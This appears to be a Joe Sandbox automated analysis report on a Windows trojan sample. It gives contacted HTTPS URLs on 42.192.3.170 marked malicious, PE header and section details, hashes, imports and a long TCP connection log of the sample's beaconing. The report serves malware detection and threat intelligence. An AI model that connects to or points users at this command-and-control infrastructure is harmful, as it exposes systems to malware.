                  https://42.192.3.170/dpixel)yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2306808221.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364539586.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2078970685.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 
00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/dpixel0yZah650lHL.exe, 00000000.00000003.2913198165.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2630411066.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/dpixelHGyZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3191073968.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/pixel0yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://42.192.3.170/dpixel;XyZah650lHL.exe, 00000000.00000003.1944793809.00000000007A4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  IP:42.192.3.170
                  Domain:unknown
                  Country:China
                  ASN:4249
                  ASN Name:LILLY-ASUS
                  Malicious:true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1583548
                  Start date and time:2025-01-03 02:51:04 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:yZah650lHL.exe
                  renamed because original name is a hash value
                  Original Sample Name:5ed55475a1fe6c18c1a67fa8c7008661.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 15
                  • Number of non-executed functions: 165
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  Time:20:51:54
                  Type:API Interceptor
                  Description:12349120x Sleep call for process: yZah650lHL.exe modified
                  No context
                  No context
                  No context
                  No created / dropped files found
                  File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Entropy (8bit):7.240070803648336
                  TrID:
                  • Win64 Executable (generic) (12005/4) 74.80%
                  • Generic Win/DOS Executable (2004/3) 12.49%
                  • DOS Executable Generic (2002/1) 12.47%
                  • VXD Driver (31/22) 0.19%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                  File name:yZah650lHL.exe
                  File size:328'704 bytes
                  MD5:5ed55475a1fe6c18c1a67fa8c7008661
                  SHA1:4ecc93379148eefce19f8f6ded6d141f7100bbcb
                  SHA256:57a370d35e41f662454ba59baeddf042cb536c75e92e6022a63de197fd1377ba
                  SHA512:11b6e14c6a7eb32491f23dd36fcdca6486e5e2180b9a66be6a269782e7df26ec13eadf850074bf432ae2584996a787df2e21856af7831184c29d5d5755d5dbb3
                  SSDEEP:6144:RjoxHcRTjI8tHsj/JWe59MRtJKBk7Yxt6W6/ur56jqOsljLmT:loSJTtHA759MRt8BMut6W6rGljLm
                  TLSH:47649D6DB7D8A52CC4374A30B5769E5EB09703CEAACDC7C51449B9383F60A8E2C6F854
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......E......... ............................
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x4014c0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                  TLS Callbacks:0x401ba0
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:147442e63270e287ed57d33257638324
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54000 | 0x8d8 | .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x51000 | 0x2b8 | .pdata
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x50060 | 0x28 | .rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x54224 | 0x1e8 | .idata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x20a8 | 0x2200 | ba98beafce4128c14539a20f3e854b25 | False | 0.5734145220588235 | data | 6.010394259460846 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data | 0x4000 | 0x4bcf0 | 0x4be00 | ac1c34563f56dbeb85d2b50c8636bbe4 | False | 0.6249292112850082 | dBase III DBT, version number 0, next free block index 10, 1st item "\017\250\357h\017\250\357h\017\250\357h\017C\354h\177\250\357h\017\250\357h\017\250\357h\017\210\354h\177\256\357h\017\250\357h\017\250\357h\017\250\357h\017\250\357h\017\250\357h\017\250\357h!\334\212\020{\250\357h\215\251\354h\017\270\357h\017\252\354h\017\254\357h\017\250\357h\017\250\357h\017\250\357h/\250\357\010!\332\213\011{\311\357h" | 7.238728588310928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata | 0x50000 | 0x910 | 0xa00 | 5fcc7830b4dcd602b35eeb7f1712e8fa | False | 0.241796875 | data | 4.459688665734325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                  .pdata | 0x51000 | 0x2b8 | 0x400 | f88aef14dea168f37249daf0dce04c78 | False | 0.37890625 | data | 3.2311971178670404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                  .xdata | 0x52000 | 0x238 | 0x400 | 6ce9e303fb86766d702ecb2b174cf348 | False | 0.2578125 | data | 2.6337753778508075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                  .bss | 0x53000 | 0x9d0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata | 0x54000 | 0x8d8 | 0xa00 | 3aae8d98b4d34bad008e73a14573bffd | False | 0.323828125 | data | 3.966749721413537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .CRT | 0x55000 | 0x68 | 0x200 | 52d79e9aecf5d5c3145d3ec54aa197a8 | False | 0.0703125 | data | 0.2709192282599745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .tls | 0x56000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  DLL | Import
                  KERNEL32.dll | CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
                  msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jan 3, 2025 02:52:36.368048906 CET49757443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:36.368057966 CET4434975742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:36.369261026 CET49757443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:36.369266987 CET4434975742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:36.928798914 CET4434975742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:36.928834915 CET4434975742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:36.928920984 CET49757443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:36.939598083 CET49757443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:36.939620972 CET4434975742.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:36.939647913 CET49757443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:36.940133095 CET49757443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:37.339715958 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:37.339749098 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:37.339811087 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:37.340168953 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:37.340182066 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:38.608048916 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:38.608798981 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:38.609189987 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:38.609196901 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:38.610362053 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:38.610367060 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:39.215344906 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:39.215404034 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:39.215439081 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.215457916 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.220172882 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.220191002 CET4434975842.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:39.220202923 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.220397949 CET49758443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.333578110 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.333621025 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:39.333734035 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.333986044 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:39.334001064 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:40.510943890 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:40.510998964 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:40.511707067 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:40.511717081 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:40.512857914 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:40.512862921 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:41.046519041 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:41.046571016 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:41.046587944 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.046614885 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.051680088 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.051702023 CET4434975942.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:41.051709890 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.051745892 CET49759443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.161752939 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.161796093 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:41.161878109 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.162127972 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:41.162143946 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:42.337455988 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:42.342806101 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:42.343189955 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:42.343199968 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:42.344584942 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:42.344590902 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:42.869386911 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:42.869430065 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:42.869442940 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:42.869467020 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:42.945560932 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:42.945578098 CET4434976042.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:42.945586920 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:42.945617914 CET49760443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:43.186984062 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:43.187016964 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:43.187102079 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:43.187335014 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:43.187347889 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:44.395340919 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:44.395426989 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:44.395808935 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:44.395819902 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:44.396987915 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:44.396991968 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:44.949820042 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:44.949867010 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:44.949888945 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:44.949917078 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:44.951967001 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:44.951980114 CET4434976142.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:44.951989889 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:44.952023029 CET49761443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:45.067898989 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:45.067936897 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:45.068106890 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:45.068310022 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:45.068325043 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.273247957 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.273307085 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.273677111 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.273684025 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.274777889 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.274784088 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.833545923 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.833590984 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.833619118 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.833642006 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.833890915 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.833905935 CET4434976242.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.833920002 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.833952904 CET49762443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.958694935 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.958724022 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:46.958792925 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.959060907 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:46.959070921 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.160397053 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.160470009 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.161798000 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.161804914 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.163250923 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.163254976 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.707542896 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.707587957 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.707611084 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.707634926 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.709649086 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.709660053 CET4434976342.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.709670067 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.709703922 CET49763443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.817955971 CET49764443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.817985058 CET4434976442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:48.818067074 CET49764443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.818252087 CET49764443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:48.818264008 CET4434976442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:50.022031069 CET4434976442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:50.022092104 CET49764443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:50.022486925 CET49764443192.168.2.442.192.3.170
                  Jan 3, 2025 02:52:50.022495031 CET4434976442.192.3.170192.168.2.4
                  Jan 3, 2025 02:52:50.023607969 CET49764443192.168.2.442.192.3.170
